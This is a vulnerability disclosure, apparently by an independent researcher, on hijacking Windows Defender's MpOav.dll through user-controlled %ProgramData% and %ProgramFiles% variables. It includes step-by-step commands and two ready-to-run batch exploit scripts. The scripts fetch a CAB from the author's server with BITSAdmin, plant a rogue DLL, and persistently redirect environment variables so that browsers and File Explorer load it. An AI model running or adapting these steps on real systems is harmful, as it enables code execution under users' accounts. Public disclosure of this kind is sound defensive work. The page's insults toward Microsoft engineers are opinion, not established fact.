anti-malware interfaces of Microsoft® Windows NT.
The tamper protection announced in the MSKB articles 2769299 and 4490103, which is described in more detail in Protect security settings with tamper protection, is a bad joke, while its documentation tells a blatant lie:
With tamper protection, malicious apps are prevented from taking actions like these:
- Disabling virus and threat protection
- Disabling real-time protection
- Turning off behavior monitoring
- Disabling antivirus (such as IOfficeAntivirus (IOAV))
- Disabling cloud-delivered protection
- Removing security intelligence updates
The anti-malware interfaces implemented in Windows, like almost all so-called security software, don’t increase the safety and security of the operating system but decrease it instead, and enable attacks in the first place!
As shown hereafter, Windows Defender is not even able to protect itself, despite the highlighted claim from its documentation cited above.
%ProgramFiles%\Windows Defender\ and %ProgramFiles(x86)%\Windows Defender\ to %ProgramData%\Microsoft\Windows Defender\platform\‹version›\, violating the minimum requirements of their own, almost 30 (in words: thirty) years old Designed for Windows specification.
Note: I wish that somebody working for Microsoft would be able to understand the English language and teach developers the difference between program files and (program) data as well as (application) data!
Ever since this braindead move, the pathnames registered for the COM classes provided by Windows Defender reference the environment variable ProgramData:
REGEDIT4
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}]
@="Defender CSP"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{195B4D07-3DE2-4744-BBF2-D90121AE785B}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\DefenderCSP.dll\""
"ThreadingModel"="Free"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\MpOav.dll\""
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}]
@="Windows Defender WMI Provider"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{A7C452EF-8E9F-42EB-9F2B-245613CA0DC9}\InprocServer32]
@=expand:"\"%ProgramData%\\Microsoft\\Windows Defender\\platform\\4.18.2003.8-0\\ProtectionManagement.dll\""
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
Note: the double quotes around the DLL pathnames are superfluous and thus yet another indication of Microsoft’s sloppy development process as well as the lack of thorough quality assurance and supervision!
Of special interest here is the implementation of the IOfficeAntiVirus COM interface, documented in the MSKB article Microsoft Windows Defender helps provide real-time protection: introduced with Windows 2000 and Internet Explorer 5, it is called (for example) by the Attachment Manager introduced with Windows XP SP2 and Internet Explorer 6 SP2.
The Attachment Manager is in turn called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page, an email or an attachment, and by File Explorer when such a file is to be opened or executed.
In the first case the Attachment Manager adds the Mark of the Web, an NTFS Alternate Data Stream named Zone.Identifier containing the text [ZoneTransfer]\r\nZoneId=‹integer›\r\n, to the saved file; in the second case it evaluates the Mark of the Web.
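The Zone.Identifier stream described above, parsed and produced by an added Python example; this is not code from the page or from the Vulnerability and Exploit Detector. The sample stream, the hypothetical host URL in it and all function names are constructed; the ReferrerUrl and HostUrl lines that newer Windows versions append to the stream are tolerated by the parser but not required.

```python
"""Read and write the Zone.Identifier alternate data stream (the Mark of the Web).
Added example, not code from the page or from the Vulnerability and Exploit Detector."""
import re

# URLZONE values as used by the Attachment Manager; a downloaded file gets 3 (Internet).
ZONE_NAMES = {0: "Local Machine", 1: "Local Intranet", 2: "Trusted Sites",
              3: "Internet", 4: "Restricted Sites"}

def parse_zone_identifier(text):
    """Parse the stream text "[ZoneTransfer]\\r\\nZoneId=<integer>\\r\\n" into a dict.
    Returns {'zone_id': int or None, ...} plus any other key=value pairs of the
    [ZoneTransfer] section (newer Windows versions add ReferrerUrl and HostUrl)."""
    result = {"zone_id": None}
    section = None
    for raw in text.replace("\r\n", "\n").split("\n"):
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            section = m.group(1).lower()          # only [ZoneTransfer] is meaningful
            continue
        if section != "zonetransfer" or "=" not in line:
            continue
        key, _, value = line.partition("=")
        if key.strip().lower() == "zoneid":
            result["zone_id"] = int(value) if value.strip().isdigit() else None
        else:
            result[key.strip()] = value.strip()
    return result

def zone_name(zone_id):
    return ZONE_NAMES.get(zone_id, f"unknown zone {zone_id}")

def is_marked_as_untrusted(text):
    """True when the stream says Internet (3) or Restricted Sites (4)."""
    zone_id = parse_zone_identifier(text)["zone_id"]
    return zone_id is not None and zone_id >= 3

def make_zone_identifier(zone_id, referrer_url=None, host_url=None):
    """Build the stream text the way the Attachment Manager writes it (CRLF line ends)."""
    lines = ["[ZoneTransfer]", f"ZoneId={int(zone_id)}"]
    if referrer_url:
        lines.append(f"ReferrerUrl={referrer_url}")
    if host_url:
        lines.append(f"HostUrl={host_url}")
    return "\r\n".join(lines) + "\r\n"

def read_mark_of_the_web(path):
    """On NTFS the stream is reachable as '<path>:Zone.Identifier'; None when absent."""
    try:
        with open(f"{path}:Zone.Identifier", encoding="utf-8", errors="replace") as stream:
            return parse_zone_identifier(stream.read())
    except OSError:
        return None

# Constructed sample, in the shape described above, with a hypothetical host URL.
SAMPLE_STREAM = "[ZoneTransfer]\r\nZoneId=3\r\nHostUrl=https://example.invalid/SENTINEL.EXE\r\n"
```

read_mark_of_the_web() only finds a stream on NTFS volumes on Windows; on any other file system, or when the file was saved by a program that never called the Attachment Manager, it returns None, which is exactly the case a defender has to treat as "unknown origin" rather than "trusted".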
Thanks to the (user-controlled) environment variable ProgramData specified in the registered pathname "%ProgramData%\Microsoft\Windows Defender\platform\‹version›\MpOav.dll", an (unprivileged) attacker can provide an arbitrary (rogue or malicious) DLL which is then loaded and executed by WWW browsers, mail and news clients, instant messengers and File Explorer whenever the user stores or opens a downloaded file, a WWW page or an attachment.
Note: this well-known weakness is documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC™.
1. Log on to an arbitrary (unprivileged) user account and start the Command Processor %SystemRoot%\System32\Cmd.exe alias %ComSpec%.
2. Verify that the tamper protection is enabled and the IOAV protection is not disabled:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
    TamperProtection    REG_DWORD    0x1
ERROR: The specified registry key or value was not found.
ERROR: The specified registry key or value was not found.
3. Download the cabinet archive SENTINEL.CAB as well as the portable executable image file SENTINEL.EXE of the Vulnerability and Exploit Detector and save them in your Downloads directory %USERPROFILE%\Downloads\:
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
START https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
Note: the downloaded files get the Mark of the Web!
4. Extract the SENTINEL.DLL for both processor architectures (32-bit: I386; 64-bit: AMD64) into your Temp directory %TMP%\:
EXPAND.EXE "%USERPROFILE%\Downloads\SENTINEL.CAB" /F:* "%TMP%"
Microsoft (R) File Expansion Utility Version 10.0.11001.16384
Copyright (C) Microsoft Corporation. All rights reserved.
Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue
Expanding Files ....
Expanding Files Complete ...
7 files total.
5. Determine the registered pathname of MPOAV.DLL:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32" /VE
HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32
    (Default)    REG_EXPAND_SZ    "%ProgramData%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
6. Choose an arbitrary directory where you can create subdirectories, for example your user profile %USERPROFILE%\, the root directory of Windows’ system drive %SystemDrive%\, the system’s Temp directory %SystemRoot%\Temp\, or even a (remote) network share like %LOGONSERVER%\Users\Public\, then create the subdirectories Microsoft\, Windows Defender\, Platform\ and ‹version›\ displayed in the previous step 5. beneath it:
MKDIR "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0"
7. Copy the SENTINEL.DLL that matches the bitness of your system as MPOAV.DLL into the directory ‹version›\ created in the previous step 6.:
COPY "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
on 32-bit (I386 alias x86) installations, and
COPY "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
on 64-bit (AMD64 alias x64) installations!
8. Verify that you copied the appropriate SENTINEL.DLL and check its proper function:
MSIEXEC.EXE /Z "%SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll"
9. Set the environment variable ProgramData to the pathname of the directory used in step 6.:
SET ProgramData=%SystemDrive%
SETX.EXE ProgramData %SystemDrive%
10. Start every WWW browser available with the same bitness as your system, then download an arbitrary file and notice the message box displayed by the (rogue) %SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll called from the WWW browser and running unrestricted:
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
START IEXPLORE https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
"%ProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
…
11. Start the portable executable image file SENTINEL.EXE downloaded in step 3. (which got the Mark of the Web) and again notice the message box displayed by the (rogue) %SystemDrive%\Microsoft\Windows Defender\platform\4.18.2003.8-0\MpOav.dll, now called from File Explorer:
START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Rem Copyright © 2018-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
If Not Defined ProgramData Exit /B
If Not Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B
SetLocal EnableDelayedExpansion EnableExtensions
For /F "Delims== Tokens=2" %%? In ('Assoc "CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InProcServer32"') Do Set OFFENDER=%%~?
If /I Not "%OFFENDER:~0,50%" == "%%ProgramData%%\Microsoft\Windows Defender\Platform\" Exit /B
If /I Not "%OFFENDER:~-10%" == "\MPOAV.dll" Exit /B
Set OFFENDER=!OFFENDER:%%ProgramData%%=%SystemDrive%!
If Exist "%OFFENDER%" Exit /B
"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B
MkDir "%OFFENDER:~0,-10%"
If Defined ProgramFiles(x86) Copy "%TMP%\AMD64\SENTINEL.DLL" "%OFFENDER%"
If Not Defined ProgramFiles(x86) Copy "%TMP%\I386\SENTINEL.DLL" "%OFFENDER%"
Set ProgramData=%SystemDrive%
"%SystemRoot%\System32\SetX.exe" ProgramData "%SystemDrive%"
Start https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
Start IEXPLORE https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
"%ProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
Exit /B
“After investigation, our engineers have determined that this behavior is by design and does not constitute a vulnerability as reported.”
OUCH¹: please teach these engineers the difference between a pathname registered as %ProgramData%\…\‹filename›.‹extension› and a pathname registered as C:\ProgramData\…\‹filename›.‹extension›!
Hint: the latter does not allow loading and executing an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!
The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.
“For an attacker to do as the report indicates, they would already need to have gained sufficient control over the victim’s system to change the ProgramFiles environment variable for the process that is instantiating this COM class. This highlights local code execution.”
OUCH²: the attack surface in this scenario is provided by Windows Defender itself, whose poor implementation (see above) allows the attack in the first place.
“Additionally, our design to get AV to load in a utility process greatly reduces the attack surface of this scenario.”
There is also no utility process started here: the attacker-controlled DLL is loaded and executed in the processes which want to call the AV, instead of the DLL installed with Windows Defender, preventing exactly the intended execution of the AV’s utility process and defeating your design!
“Utility processes are also more restricted than the browser process generally so this is another win in addition to the process decoupling.”
OUCH³: there is neither a utility process nor a decoupled process involved! The demonstration runs an arbitrary (rogue or malicious) DLL in the process of a WWW browser, a mail and news client, an instant messenger as well as the shell alias File Explorer, with the credentials of the current user, unrestricted.
“As such, we are closing this case.”
That said, I conclude you are neither interested in trustworthy computing nor in the safety and security of your customers; I recommend that you, your developers, your engineers and of course your obviously incompetent managers take a look at your government’s Cybersecurity & Infrastructure Security Agency’s Secure by Design initiative and the underlying principle!
windir, SystemRoot, ProgramFiles, CommonProgramFiles, ProgramFiles(x86) and CommonProgramFiles(x86).
Windows Defender, as shipped with Windows Vista® and newer versions of Windows™ NT, installs a COM class which implements the IOfficeAntiVirus COM interface:
REGEDIT4
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
@="Windows Defender IOfficeAntiVirus implementation"
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts]
@="Scanned Hosting Applications"
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\shdocvw]
@="IAttachmentExecute"
"Enable"=dword:00000001
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Hosts\urlmon]
@="ActiveX controls"
"Enable"=dword:00000001
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\Implemented Categories\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}]
[HKEY_CLASSES_ROOT\CLSID\{2781761E-28E0-4109-99FE-B9D127C57AFE}\InprocServer32]
@=expand:"%ProgramFiles%\\Windows Defender\\MpOav.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}]
@="Windows Antimalware Scan Interface proxy stub"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{b2cabfe4-fe04-42b1-a5df-08d483d4d100}\InprocServer32]
@=expand:"%windir%\\system32\\amsiproxy.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}]
@="Windows Antimalware Scan Interface implementation"
[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InprocServer32]
@=expand:"%windir%\\system32\\amsi.dll"
"ThreadingModel"="Both"
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\AMSI\Providers\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\Extension Validation\{2781761E-28E0-4109-99FE-B9D127C57AFE}]
This COM interface is (for example) called by the Attachment Manager, which is in turn called by WWW browsers, mail and news clients, instant messengers, etc. after they store a downloaded file, a WWW page or an attachment, and by File Explorer when such a file (which carries the Mark of the Web) is to be opened or executed.
Since (user) environment variables set in a user’s profile obscure (system) environment variables with the same name set for the machine, (unprivileged) users can redirect all those paths containing environment variables and execute arbitrary (rogue or malicious) DLLs and programs instead of the intended DLLs and programs!
Note: the resulting well-known weakness is documented as CWE-22: Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal'), CWE-73: External Control of File Name or Path, CWE-426: Untrusted Search Path and CWE-427: Uncontrolled Search Path Element in the CWE™, allowing well-known attacks like CAPEC-13: Subverting Environment Variable Values and CAPEC-471: Search Order Hijacking documented in the CAPEC™.
Note: Microsoft Security Essentials, available for Windows XP, Windows Vista and Windows 7, does not suffer from this vulnerability!
1. Log on to an arbitrary (unprivileged) user account and start the Command Processor %SystemRoot%\System32\Cmd.exe alias %ComSpec%.
2. Verify that the tamper protection is enabled and the IOAV protection is not disabled:
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features" /V "TamperProtection"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
REG.EXE QUERY "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection" /V "DisableIOAVProtection"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Features
    TamperProtection    REG_DWORD    0x1
ERROR: The specified registry key or value was not found.
ERROR: The specified registry key or value was not found.
3. Create a directory Rogue Program Files\ in the root directory of Windows’ system drive, copy the directory %ProgramFiles%\Windows Defender\ with its contents into the empty new directory, then create junction reparse points to all other subdirectories of the %ProgramFiles%\ directory inside the new directory:
MKDIR "%SystemDrive%\Rogue Program Files"
XCOPY.EXE "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
FOR /D %? IN ("%ProgramFiles%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files\%~nx?" "%~?"
C:\Program Files\Windows Defender\MpAsDesc.dll
C:\Program Files\Windows Defender\MpClient.dll
C:\Program Files\Windows Defender\MpCmdRun.exe
C:\Program Files\Windows Defender\MpCommu.dll
C:\Program Files\Windows Defender\MpEvMsg.dll
C:\Program Files\Windows Defender\MpOAV.dll
C:\Program Files\Windows Defender\MpRTP.dll
C:\Program Files\Windows Defender\MpSvc.dll
C:\Program Files\Windows Defender\MSASCui.exe
C:\Program Files\Windows Defender\MsMpCom.dll
C:\Program Files\Windows Defender\MsMpLics.dll
C:\Program Files\Windows Defender\MsMpRes.dll
C:\Program Files\Windows Defender\en-US\MpAsDesc.dll.mui
C:\Program Files\Windows Defender\en-US\MpEvMsg.dll.mui
C:\Program Files\Windows Defender\en-US\MsMpRes.dll.mui
15 File(s) copied
Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…
…
Junction created for C:\Rogue Program Files\… <<===>> C:\Program Files\…
4. On 64-bit installations, additionally create a directory Rogue Program Files (x86)\ in the root directory of Windows’ system drive, copy the directory %ProgramFiles(x86)%\Windows Defender\ with its contents into the empty new directory, then create junction reparse points to all other subdirectories of the %ProgramFiles(x86)%\ directory inside the new directory:
MKDIR "%SystemDrive%\Rogue Program Files (x86)"
XCOPY.EXE "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
FOR /D %? IN ("%ProgramFiles(x86)%\*") DO @MKLINK /J "%SystemDrive%\Rogue Program Files (x86)\%~nx?" "%~?"
C:\Program Files (x86)\Windows Defender\MpAsDesc.dll
C:\Program Files (x86)\Windows Defender\MpClient.dll
C:\Program Files (x86)\Windows Defender\MpOAV.dll
C:\Program Files (x86)\Windows Defender\MsMpLics.dll
C:\Program Files (x86)\Windows Defender\en-US\MpAsDesc.dll.mui
C:\Program Files (x86)\Windows Defender\en-US\MpEvMsg.dll.mui
6 File(s) copied
Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…
…
Junction created for C:\Rogue Program Files (x86)\… <<===>> C:\Program Files (x86)\…
5. Download the cabinet archive SENTINEL.CAB as well as the portable executable image file SENTINEL.EXE of the Vulnerability and Exploit Detector and save them in your Downloads directory %USERPROFILE%\Downloads\:
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
START https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
Note: the downloaded files get the Mark of the Web!
6. Extract the SENTINEL.DLL for both processor architectures (32-bit: I386; 64-bit: AMD64) into your Temp directory %TMP%\:
EXPAND.EXE "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
Microsoft (R) File Expansion Utility Version 6.1.7600.16385
Copyright (C) Microsoft Corporation. All rights reserved.
Adding C:\Users\Stefan\AppData\Local\Temp\SENTINEL.INF to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\AMD64\SENTINEL.EXE to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\I386\SENTINEL.EXE to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.DLL to Expansion Queue
Adding C:\Users\Stefan\AppData\Local\Temp\IA64\SENTINEL.EXE to Expansion Queue
Expanding Files ....
Expanding Files Complete ...
7 files total.
7. On 32-bit installations, copy the 32-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll:
COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
8. On 64-bit installations, copy the 64-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll and the 32-bit SENTINEL.DLL over %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll:
COPY /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll"
COPY /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll"
9. Save the value of the environment variable ProgramFiles, then set it to the pathname of the directory created in step 3.:
SET RealProgramFiles=%ProgramFiles%
SET ProgramFiles=%SystemDrive%\Rogue Program Files
SETX.EXE ProgramFiles "%SystemDrive%\Rogue Program Files"
10. On 64-bit installations, additionally save the value of the environment variable ProgramFiles(x86), then set it to the pathname of the directory created in step 4.:
SET RealProgramFiles(x86)=%ProgramFiles(x86)%
SET ProgramFiles(x86)=%SystemDrive%\Rogue Program Files
SETX.EXE ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"
11. Download an arbitrary file with your WWW browser, for example SENTINEL.DLL, or save an attachment in your mail client:
START https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
"%RealProgramFiles%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
"%RealProgramFiles(x86)%\Internet Explorer\IEXPLORE.EXE" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
This loads and executes %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll and %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll, which display message boxes with information about their caller, instead of C:\Program Files\Windows Defender\MpOAV.dll and C:\Program Files (x86)\Windows Defender\MpOAV.dll!
12. Start the portable executable image file SENTINEL.EXE downloaded in step 5. (which got the Mark of the Web) and again notice the message box displayed by %SystemDrive%\Rogue Program Files\Windows Defender\MpOAV.dll or %SystemDrive%\Rogue Program Files (x86)\Windows Defender\MpOAV.dll, now called from File Explorer:
START "" "%USERPROFILE%\Downloads\SENTINEL.EXE"
Rem Copyright © 2009-2024, Stefan Kanthak <stefan.kanthak@nexgo.de>
Rem (KB4052623)
Rem If Defined ProgramData If Exist "%ProgramData%\Microsoft\Windows Defender\Platform" Exit /B
"%SystemRoot%\System32\BITSAdmin.exe" /TRANSFER Offender /DOWNLOAD /PRIORITY FOREGROUND http://skanthak.hier-im-netz.de/download/SENTINEL.CAB "%TMP%\SENTINEL.CAB"
If Not Exist "%TMP%\SENTINEL.CAB" Exit /B
"%SystemRoot%\System32\Expand.exe" "%TMP%\SENTINEL.CAB" /F:* "%TMP%"
If Not Exist "%TMP%\AMD64\SENTINEL.DLL" Exit /B
If Not Exist "%TMP%\I386\SENTINEL.DLL" Exit /B
If Not Defined ProgramFiles Exit /B
If Not Exist "%ProgramFiles%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files" Exit /B
MkDir "%SystemDrive%\Rogue Program Files"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles%\Windows Defender\*" "%SystemDrive%\Rogue Program Files\Windows Defender" /S /I /H
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files\%%~nx?" "%%?"
Set RealProgramFiles=%ProgramFiles%
Set ProgramFiles=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles "%SystemDrive%\Rogue Program Files"
Start https://skanthak.hier-im-netz.de/download/SENTINEL.CAB
"%RealProgramFiles%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.DLL
If Not Defined ProgramFiles(x86) Exit /B
If Not Exist "%ProgramFiles(x86)%\Windows Defender\MPOAV.dll" Exit /B
If Exist "%SystemDrive%\Rogue Program Files (x86)" Exit /B
MkDir "%SystemDrive%\Rogue Program Files (x86)"
"%SystemRoot%\System32\XCopy.exe" "%ProgramFiles(x86)%\Windows Defender\*" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender" /S /I /H
Copy /Y "%TMP%\AMD64\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files\Windows Defender\MPOAV.dll"
Copy /Y "%TMP%\I386\SENTINEL.DLL" "%SystemDrive%\Rogue Program Files (x86)\Windows Defender\MPOAV.dll"
For /D %%? In ("%ProgramFiles(x86)%\*") Do @MkLink /J "%SystemDrive%\Rogue Program Files (x86)\%%~nx?" "%%?"
Set RealProgramFiles(x86)=%ProgramFiles(x86)%
Set ProgramFiles(x86)=%SystemDrive%\Rogue Program Files
"%SystemRoot%\System32\SetX.exe" ProgramFiles(x86) "%SystemDrive%\Rogue Program Files (x86)"
"%RealProgramFiles(x86)%\Internet Explorer\IExplore.exe" https://skanthak.hier-im-netz.de/download/SENTINEL.EXE
Exit /B
“This was also assessed in a similar way as the other reported case. After investigation, our engineers have determined that this behavior is by design and does not constitute a vulnerability as reported.”
OUCH¹: please teach these engineers the difference between a pathname registered as %ProgramFiles%\…\‹filename›.‹extension› and a pathname registered as C:\Program Files\…\‹filename›.‹extension›!
Hint: the latter does not allow loading and executing an arbitrary (rogue or malicious) DLL from an arbitrary user-controlled path just by setting an environment variable!
The observed behaviour is therefore not by design, but due to careless implementation by clueless developers and the total lack of any quality assurance.
